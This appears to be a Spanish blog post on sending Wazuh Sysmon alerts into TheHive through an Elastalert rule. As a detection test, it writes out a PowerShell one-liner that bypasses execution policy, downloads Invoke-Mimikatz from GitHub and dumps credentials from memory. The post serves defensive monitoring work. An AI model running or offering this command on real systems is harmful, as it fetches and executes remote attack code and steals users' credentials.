Integrar alertas Sysmon de Wazuh en TheHive

Seguimos configurando nuestra infraestructura SIRP Open source (http://red-orbita.com/?p=8726)  En pasadas entradas vimos como Integrar Sysmon con wazuh, para poder hacer una correcta gestión de las incidencias vamos a integrar dichas alertas a TheHive mediante Elastalert

Anes de nada vamos a comprobar que funciona correcamente Sysmon y obtenemos relgas, para ello intentamos hacer un Dump de las credenciales en memoria

powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

Una vez ejecutado nos vamos a la consola de Kibana y comprobamos el correcto funcionamiento

Ahora nos vamos al servidor donde se encuentra elastalert y generamos la siguiente regla

es_host: localhost
es_port: 9200
name: TODAS LAS ALERTAS SYSMON
type: any
index: wazuh-alerts-3.x-*
num_events: 600
timeframe:
    hours: 1
realert: 
    minutes: 0
filter:
- query:
      query_string: {query: '_exists_:data.win.system.message'}
- query:
      query_string: {query: '_exists_:data.win.eventdata.integrityLevel'}
- range:
    rule.level:
      from: 8
      to: 15
alert: hivealerter
hive_connection:
  hive_host: http://the_hive
  hive_port: 9000
  hive_apikey: <Paste API key for elastalert user here>

hive_alert_config:
  title: '{match[rule][description]}'
  type: 'external'
  source: 'elastalert'
  description: '{match[data][win][system][message]}'
  severity: 2
  tags: ['Integrity Level: {match[data][win][eventdata][integrityLevel]}','Name: {match[data][win][eventdata][originalFileName]}','Level: {match[rule][level]}', 'Rule id: {match[rule][id]}', '{match[agent][name]}', '{match[rule][groups]}', '{match[_id]}']
  tlp: 3
  status: 'New'
  follow: True

hive_observable_data_mapping:
    - ip: "{match[@src_ip]}"

Reiniciamos el servicio

systemctl restart elastalert

Ahora nos vamos a Thehive y comprobamos que nos haya generado una alerta

:wq!

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

*